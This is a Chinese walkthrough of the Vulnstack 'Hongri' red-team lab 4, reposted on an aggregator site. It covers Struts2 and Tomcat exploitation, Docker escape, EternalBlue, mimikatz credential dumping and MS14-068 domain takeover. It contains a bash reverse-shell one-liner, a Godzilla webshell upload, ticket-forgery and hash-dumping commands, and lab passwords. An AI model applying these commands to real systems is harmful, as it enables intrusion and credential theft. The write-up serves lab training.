红日靶场四

这篇具有很好参考价值的文章主要介绍了红日靶场四。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

环境搭建

环境说明

官方描述

外网信息收集与利用

struts2漏洞

Tomcat漏洞

 docker逃逸

提权 

内网渗透

扫描内网主机端口

端口转发

利用永恒之蓝获得win7 

mimikatz抓取密码 

域横向移动

利用Kerberos 域用户提权漏洞获得域控WIN2008

上传msf马到域控 

 mimikatz抓取密码

远程登陆域控 


环境搭建

http://vulnstack.qiyuanxuetang.net/vuln/detail/6/

红日靶场四

环境说明

机器密码

ubuntu:ubuntu

域成员机器:douser:Dotest123

DC:administrator:Test2008

IP地址 

Kali:192.168.0.108
Ubuntu:192.168.0.102  192.168.183.128
域成员:192.168.183.129
DC:192.168.183.130

官方描述

大家好红日安全红队靶场(四)已经出来,本次靶场渗透反序列化漏洞、命令执行漏洞、Tomcat漏洞、MS系列漏洞、端口转发漏洞、以及域渗透等多种组合漏洞,希望大家多多利用。

红队评估四靶场描述

第一次搭建靶机,如有啥不足或问题,欢迎各位师傅在vlunstack微信群里提出,向师傅们学习

靶场学习路径,可参考

struts2 漏洞利用

tomcat 漏洞利用
phpmyadmin getshell

docker逃逸

ms14-068

ssh密钥利用

流量转发

历史命令信息泄露

域渗透

Web-Ubuntu上启动环境,因为环境是在Ubuntu上用docker做的,所以需要启动docker容器

先进入ubuntu启动web,开启3个环境
cd /home/ubuntu/Desktop/vulhub/struts2/s2-045
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/tomcat/CVE-2017-12615/
sudo docker-compose up -d
cd /home/ubuntu/Desktop/vulhub/phpmyadmin/CVE-2018-12613/
sudo docker-compose up -d

这里没有做phpmyadmin漏洞的利用

外网信息收集与利用

在kali中使用nmap对目标主机进行扫描,发现了192.168.0.102的主机,并开启了22、2001、2002端口都开启了tcp服务

红日靶场四

struts2漏洞

在浏览器中进行访问主机的2001端口,此时可以看到浏览的结果,上传文件后发现没有任何反应,此时发现上传之后url的后缀名发现是以.action结尾的,action可能是Java语言编写的,判断可能存在struts2的漏洞

红日靶场四

使用漏扫工具检测struts2有无漏洞,这里发现存在S2-045、S2-046两个漏洞

红日靶场四

使用S2-046漏洞发现能够命令回显。命令执行,可以看到存在一个IP地址为172.20.0.2的地址

红日靶场四

查看系统进程的cgroup信息,发现有docker

红日靶场四

在kali中开启一个监听

红日靶场四

在struts2内执行反弹shell的命令 bash -i &>/dev/tcp/192.168.0.102/8888 <&1

红日靶场四

可以看到kali中能够成功的拿到shell,进行查看时也能查看是否存在 dockerrnv 文件。此时确定是在docker中,因此需要进行docker逃逸

红日靶场四

通过mount命令将外部宿主机磁盘设备挂载进容器内部,获取对整个宿主机的文件读写权限,此外还可以通过写入计划任务等方式在宿主机执行命令。在进行挂载的时候发现没有可以挂载的光盘,无法挂载光盘,就无法向下进行,逃逸失败。然后进行查看其他端口

红日靶场四

Tomcat漏洞

2002端口是一个apache tomcat 8.5.19

红日靶场四

对该版本的tomcat进行漏洞查找,发现该版本存在CVE-2017-12617漏洞,这个漏洞CVE- 2017-12615是 Tomcat远程代码执行漏洞(PUT请求),可以使用PUT方法上传任意文件

红日靶场四

用burpsuite进行抓包,进行上传jsp的文件

红日靶场四

尝试上传文件能够成功上传

红日靶场四

发现限制了jsp文件的上传

红日靶场四

使用godzilla生成一个木马文件

红日靶场四

生成后打开查看,然后把此文件复制到burpsuite进行上传

红日靶场四

由于不能直接上传jsp文件所以,我们在jsp后添加一个/发现就能成功的上传

红日靶场四

上传完成后,在浏览器中进行访问可以成功的访问

红日靶场四

在godzilla的目标中点击添加刚刚上传的木马进行连接

红日靶场四

成功的连接,进入shell管理界面

红日靶场四

进行查看根目录下的的文件发现了docker的dokerenv文件

红日靶场四

 docker逃逸

进行查看光盘时,可以看到能够挂载的光盘

红日靶场四

创建一个文件,把光盘sda1挂载到该文件下

红日靶场四

进行挂载后,再次查看可以发现宿主主机中的一些文件

红日靶场四

提权 

尝试进行修改这些文件发现,能够进行修改文件,然后在相同版本的ubuntu中进行创建用户密码,复制到此文件中

红日靶场四

红日靶场四

使用ssh连接ubuntu即可,到此我们才真正意义上拿到了ubuntu的权限

红日靶场四

进行提权时,发现di9zu不在 sudoers 文件中,不能进行提权

红日靶场四

进行修改sudoer允许di9zu用户使用sudo命令进行提权

红日靶场四

此时已经能够拿到root的权限了

红日靶场四

查看网卡信息发现还存在一块网卡信息

红日靶场四

在kali中进行访问另一块网卡发现无法通信,推测该网卡还连接着其他内网主机

红日靶场四

上线宿主机到msf,生成一个木马文件,上传到ubuntu执行

红日靶场四

开启一个http服务

红日靶场四

在浏览器中进行浏览该文件

红日靶场四

在ubuntu中进行下载木马文件,并赋于该文件的执行权限

红日靶场四

开启一个msf监听,使用msf接收会话,执行完木马文件,可以看到msf中能够成功上线

红日靶场四

在ubuntu中进行执行制作的shell.elf木马文件

红日靶场四

内网渗透

扫描内网主机端口

由于上面已经知道了ubuntu还存在另外一张网卡连接着其他的主机,上传一个扫描工具fscan进行全方位的进行对192.168.183.0/24网段进行漏洞扫描

红日靶场四

可以看到扫描结果中有,该网段中存在另外的两台主机,分别为Windows7和Windows server 2008,IP地址分别为192.168.183.129和192.168.183.130,而且两台主机还都开启了445端口还可能存在ms17_010漏洞,而且Windows server 2008还是一个DC

红日靶场四

端口转发

由于在kali无法直接对该网段进行访问,在ubuntu中添加路由的信息。使用route命令可以借助meterpreter会话进一步msf渗透内网,已经拿下并产生meterpreter反弹会话的主机可能出于内网之中。

红日靶场四

由于内网无法直接访问,使用代理进行访问,配置代理并执行

红日靶场四

红日靶场四

利用永恒之蓝获得win7 

kali中自带代理的模块,对全局代理的配置文件进行修改,与msf中开启的代理模块的信息匹配一致

红日靶场四

使用全局代理开启msfconsole

红日靶场四

由于用fscan进行扫描后发现有可能存在ms17_010漏洞,使用msf再次进行扫描看是否存在ms17_010漏洞

红日靶场四

设置扫描的IP地址段

红日靶场四

扫描发现两台主机还是可能存在ms17_010漏洞

红日靶场四

利用ms17_010漏洞对两台主机进行渗透测试,先利用ms17_010漏洞对win7这台主机进行测试

红日靶场四

红日靶场四

发现能够成功的拿下win7这台主机的权限

红日靶场四

红日靶场四

再开启一个窗口进行尝试攻击Windows server 2008,发现不可行

红日靶场四

红日靶场四

红日靶场四

红日靶场四

上面得到了权限后进入到win7中

红日靶场四

查看这台主机的系统信息,可以发现这台主机存在域demo中

红日靶场四

使用Dos命令net view查看了当前的网络计算机列表,发现有两台主机,由于在用fscan进行扫描时发现了DC也就是域控是Windows server 2008,所以win7也就是demo域中的域成员

红日靶场四

在win7中还能够成功的ping通另一台主机Windows server 2008

红日靶场四

尝试查看win7中存在的用户,发现有douser、testclone和testwin7三个用户

红日靶场四

mimikatz抓取密码 

获取用户之后,进一步获取用户的密码。把明文密码抓取工具mimikatz上传到kali中,通过kali上传到win7中

红日靶场四

上传后,进行查看可以看到已经成功上传

红日靶场四

在win7中执行mimikatz.exe,使用privilege::debug进行提权。提示权限不够不能够获取调试权限

红日靶场四

使用exit回到meterpreter里面使用令牌窃取SYSTEM权限之后再进行mimikatz密码进行抓取

红日靶场四

红日靶场四

再次执行mimikatz.exe进入到mimikatz中进行执行privilege::debug提取权限,可以看到成功提权

红日靶场四

使用sekurlsa::logonpasswords命令进行抓取明文密码,可以看到能够成功的抓取win7中SID和用户douser的明文密码为Dotest123

红日靶场四

域横向移动

利用Kerberos 域用户提权漏洞获得域控WIN2008

拿到了域成员的帐号和密码后,直接使用一个ptt伪造票据来拿到域控权限,利用mimikatz注入票据。 

 生成一个高权限票据:

MS14-068.exe -u 域成员名@域名 -s 域成员sid -d 域控制器地址 -p 域成员密码
MS14-068.exe -u douser@DEMO.COM -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123

红日靶场四

在注入之前先查看注入前的权限,此时发现权限不够

红日靶场四
清除内存中的所有票据:

打开mimikatz

输入kerberos::purge

当看到"Ticket(s) purge for current session is OK'时,表示清除成功

将高权限的票据注入内存:

kerberos::ptc "TGT_user1@pentest.com.ccache"(双引号里面的是票据的名字)

kerberos::ptc "TGT_douser@DEMO.COM.ccache"

红日靶场四

注入票据后再次查看权限,能够成功的查取

红日靶场四

能够成功的查看另一台主机Windows server2008的目录信息

红日靶场四

上传msf马到域控 

在kali中生成一个正向连接的木马文件,上传到Windows server2008中

红日靶场四

由于无法直接访问主机Windows server2008,先上传到win7中

红日靶场四

再通过win7上传到Windows server 2008中

红日靶场四

木马上传成功后,创建服务执行木马文件,并用msf接受会话

红日靶场四  红日靶场四

红日靶场四

配置文件设置成功后进行执行监听

红日靶场四

使用copy命令复制到Windows server 2008上后使用sc创建计划任务

红日靶场四

关闭Windows server 2008的防火墙

红日靶场四

在监听界面等待一会后,可以看的监听段已经执行成功拿到权限

红日靶场四

进入系统中进行查看系统信息,发现该主机也没有打KB3011780补丁

红日靶场四

查看该主机所存在的用户

红日靶场四

查看域中的主域,发现主域为自己

红日靶场四

查看主机,一共两台主机,发现没有其他的域成员机了,则证明已经打通了所有的主机

红日靶场四

 mimikatz抓取密码

上面查看系统信息发现这台主机也没有打KB3011780的补丁,上传mimikatz进行抓取密码

红日靶场四

可以看到成功的上传了mimikatz

红日靶场四

执行mimikatz

红日靶场四

使用令牌窃取SYSTEM权限之后进行mimikatz密码进行抓取

红日靶场四

红日靶场四

由于没有明文密码,此时使用lsadump::lsa /patch读取所有域用户的哈希

红日靶场四

借助解密软件对administrator的NTLM进行解密56876536089599949a617c8718c88a6a,发现密码为Test2008

红日靶场四

远程登陆域控 

开启远程桌面

红日靶场四

在kali中开启远程桌面

红日靶场四

红日靶场四文章来源地址https://www.toymoban.com/news/detail-438785.html

到了这里,关于红日靶场四的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 红日靶场(七)vulnstack7

    环境下载 http://vulnstack.qiyuanxuetang.net/vuln/detail/9/ 靶场配置 DMZ IP段为192.168.1.0/24 二层网络 IP段为192.168.52.0/24 三层网络 IP段为192.168.93.0/24 VM新增虚拟网卡VMnet8、VMnet14。VMnet8为NAT模式,IP段为192.168.52.0/24;VMnet14为仅主机模式,IP段为192.168.93.0/24 VMnet14设为仅主机模式这样三层网络中

    2024年02月03日
    浏览(31)
  • 红日ATT&CK系列靶场(-)简记

    Step 1》信息收集 nmap 发现80、 3306 nmap -T4 -O 192.168.92.100 访问80端口 dirsearch(御剑)扫描 发现:/phpMyadmin Step 2 》漏洞利用 1.弱口令 http://192.168.92.100/phpMyadmin root/root 登录成功 2.getshell select @@basedir //查绝对路径 into outfile 写马 select \\\'?php eval($_POST[cmd]);?\\\' into outfile \\\'C://绝对路径/shell.

    2024年02月09日
    浏览(35)
  • vulnstack1 红日靶场渗透详解

    目录 环境搭建 信息收集 PhpMyAdmin 后台 Getshell into outfile Mysql日志文件写入shell CS后渗透 MSF后渗透 知识补充 nmap 参数分类 参数速查表 dirsearch ip段设置 kali可以访问win7,但不能直接访问win08和win2k3 开启win7 web/mysql服务 端口扫描 80/tcp open http 3306/tcp open mysql web目录扫描 爆破登录

    2024年02月12日
    浏览(28)
  • 红日靶场2 ATT&&CK攻击

    360免杀其实没有你想象的那么难 首先最重要的是 你要用免杀脚本对你所生成的木马病毒进行加密 然后加密系统的内核,就是上一篇文章所提及的 是通过两次加密之后 所输出的结果,让360无法感知到,然后先通过java反序列化工具将冰蝎工具的JSP后门代码上传上去,这个不会

    2024年01月18日
    浏览(34)
  • 红日靶场2 指免杀360 个人学习记录

    360安全卫士,有一说一,确实很强,这几天研究的MSF利用java反序列化的漏洞是无法利用的,其他方法也瘦小甚微 前几天在研究用 用免杀工具 go-shellcode-loader-main免杀工具对我们生成的木马进行加密 本来是用csa4.0黑客工具生成了一个jsp的恶意代码 我首先要承认,微软自带的病

    2024年01月16日
    浏览(27)
  • vulfocus靶场搭建(docker环境)

    访问方式: http://172.16.51.142 账号密码:admin/admin 登录之后,在 镜像管理 中 一键同步 可以查看所有漏洞的镜像 下载好想要练习的漏洞镜像之后,去首页启动环境,获取访问地址 不想自己本地搭建vulfocus可以访问fofa的公用靶场:  http://vulfocus.fofa.so

    2024年02月08日
    浏览(28)
  • 在kali环境下安装Beef-Xss靶场搭建

    目录 一、更新安装包 二、安装beef-xss 三、启动Beef-Xss工具 1、查看hook.js 2、查看后台登录地址 3、查看用户名和登录密码 4、登录页面 5、点击 Hook me:将配置的页面导入BEEF中 ┌──(root㉿kali)-[/home/kali] └─# apt-get update   ┌──(root㉿kali)-[/home/kali] └─# apt-get install beef-xss 第一

    2024年02月10日
    浏览(29)
  • Kali+docker搭建Vulfocus靶场并配置vulfocus漏洞环境

    好吧,上次更新博客也不记得是几年前的事情了,来说说消失的这段时间我在干嘛。最近超级无敌忙,每天送餐从早送到晚,同时兼职某团和饿了某,现在正在给一个靓女送杯奶茶,做安服税后5千块钱的工资能干嘛?赶紧和我一起做某团骑手,少走30年弯路。 难得有空,最近

    2024年02月05日
    浏览(36)
  • 云服务器利用Docker搭建sqli-labs靶场环境

    一、安装宝塔面板 使用xshell、electerm、SecureCRT等远程终端连接登陆上云服务器,在Linux宝塔面板使用脚本安装 安装后,如下图:按照提示,在云服务器防火墙/安全组放行Linux宝塔面板的端口 在浏览器打开上述网址,登录Linux宝塔面板: 二、安装Docker 在Linux宝塔面板登陆后,在

    2024年02月10日
    浏览(40)
  • CTF靶场搭建及Web赛题制作与终端docker环境部署

    ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥ ♡ ♥   写在前面 ╔═══════════════════════════════════════════════════

    2024年02月04日
    浏览(65)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包